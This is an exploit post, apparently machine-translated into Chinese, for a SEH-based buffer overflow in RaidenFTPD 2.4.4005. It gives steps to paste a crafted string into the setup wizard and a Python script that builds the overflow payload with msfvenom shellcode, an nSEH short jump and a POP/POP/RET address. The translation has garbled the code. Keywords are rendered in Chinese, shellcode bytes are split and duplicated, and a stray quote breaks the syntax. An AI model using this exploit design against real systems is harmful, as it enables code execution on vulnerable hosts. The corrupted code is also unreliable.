raidenftpd 2.4.4005-缓冲区溢出（SEH）

HackApt-37 Team · 04 9, 2025

＃利用标题: raidenftpd 2.4.4005-缓冲区溢出（SEH）
＃日期: 18/07/2023
＃利用作者: Andre Nogueira
＃供应商homepage: https://www.raidenftpd.com/en/
＃软件链接: http://www.raidenmaild.com/download/raidenftpd2.exe
＃版本: raidenftpd 2.4.4005
＃测试在: Microsoft Windows 10 Build 19045
＃1.-打开raidenftpd
＃2.-单击“设置” - '逐步设置向导'
＃3.-运行python code: exploit-raidenftpd.py
＃4.--将exploit-raiden.txt的内容粘贴到字段“服务器名称”中
＃5.-单击“下一步” - 'Next' - 'OK'
＃6.- pop calc.exe
＃！/usr/bin/env Python3
从结构进口包
崩溃=2000
偏移=497
＃msfvenom -p windows/exec cmd='calc.exe'-a x86 -f python -v shellCode -b'\ x00 \ x00 \ x0d'
shellCode=b'\ x90' * 8
shellCode +=b'\ xb8 \ x9c \ x78 \ x14 \ x60 \ xd9 \ xc2 \ xd9 \ xd9 \ x74 \ x74 \ x24 \ xf4'
shellCode +=b'\ x5a \ x33 \ xc9 \ xb1 \ x31 \ x83 \ XEA \ XEA \ XFC \ x31 \ x31 \ x42 \ x42 \ x0f'
shellCode +=b'\ x03 \ x42 \ x93 \ x9a \ xe1 \ x9c \ x9c \ x43 \ xd8 \ xd8 \ x0a \ x5d \ x5d \ x93'
shellCode +=b'\ xbd \ x83 \ xb8 \ xa2 \ xfd \ xf0 \ xf0 \ xc9 \ x94 \ x94 \ xcd \ x73 \ x73 \ x9f'
shellCode +=b'\ x18 \ xa5 \ xd6 \ x34 \ xab \ xcb \ xcb \ xfe \ x3b \ x3b \ x1c \ x61 \ x61 \ xd9'
shellCode +=b'\ x72 \ x9d \ xda \ x19 \ x14 \ x1d \ x1d \ x21 \ x4e \ x4e \ xf6 \ x1c \ x1c \ xea''
shellCode +=b'\ x83 \ xf7 \ x59 \ x17 \ x69 \ xa5 \ x32 \ x32 \ x53 \ xdc \ xdc \ x5a \ x37'
shellCode +=b'\ x29 \ xdd \ xd1 \ x0b \ xbf \ x65 \ x65 \ x05 \ xdb \ xbe \ xbe \ x44 \ x98'
shellCode +=b'\ x50 \ x99 \ x46 \ x1a \ xb5 \ x91 \ xce \ xce \ x04 \ xda \ xda \ x9c \ x99'
shellCode +=b'\ xbf \ x28 \ x6a \ x18 \ x16 \ x61 \ x61 \ x93 \ xb7 \ xb7 \ x57 \ x57 \ x4e \ x66'
shellCode +=b'\ xc9 \ x90 \ x68 \ x99 \ xbc \ xe8 \ x8b \ x8b \ x24 \ xc7 \ x2e \ x2e \ xf6'
shellCode +=b'\ xf2 \ x42 \ xb5 \ x50 \ x70 \ xf4 \ xf4 \ x11 \ x61 \ x61 \ x55 \ x63 \ x63 \ xd1'
shellCode +=b'\ x6d \ x12 \ xe7 \ xbd \ x71 \ xa5 \ x24 \ x24 \ xb6 \ x8d \ x8d \ x2e \ xcb'
shellCode +=b'\ x19 \ x04 \ x74 \ xe8 \ xbd \ x4d \ x4d \ x2e \ x91 \ x91 \ xe4 \ x2b \ x81'
shellCode +=b'\ xae \ xf7 \ x94 \ x7e \ x0b \ x73 \ x38 \ x38 \ x6a \ x26 \ x26 \ xde \ x56'
shellCode +=b'\ x6d \ xb4 \ x64 \ x14 \ x6d \ xc6 \ xc6 \ x66 \ x08 \ x06 \ x06 \ xf7 \ xf7 \ xed'
shellCode +=b'\ xc7 \ x51 \ x08 \ x24 \ xac \ xae \ x42 \ x42 \ x65 \ x65 \ x84 \ x26 \ x26 \ x0b'
shellCode +=b'\ xff \ x95 \ x2a \ xac \ xd5 \ xd9 \ x52 \ x52 \ x2f \ xdc \ xdc \ xa1 \ xa1 \ xa0'
shellCode +=b'\ x2f \ x95 \ xa4 \ xed \ xf7 \ x45 \ xd4 \ xd4 \ x7e \ x92 \ x92 \ x69 \ x4b'
shellCode +=b'\ x7e \ xb7 \ x09 \ x0a \ xec \ x5b \ x5b \ xe0 \ xa9 \ x94 \ x94 \ xfe \ xfc'
nseh=b'\ xeb \ x06 \ x90 \ x90'＃8字节的短跳跃
seh=pack（'l'，0x7c1e76ff）＃pop eax; pop esi; ret;=msvcp70.dll
缓冲区=b'a' *偏移
缓冲区+=NSEH
缓冲区+=SEH
缓冲区+=shellCode
缓冲区+=b'd' *（crash -len（buffer））
file_payload=open（'exploit-raiden.txt'，'wb'）
print（'[*]创建.txt文件的有效载荷'）
file_payload.write（缓冲区）
打印（'[*]将恶意有效载荷写入.txt文件'）
file_payload.close（）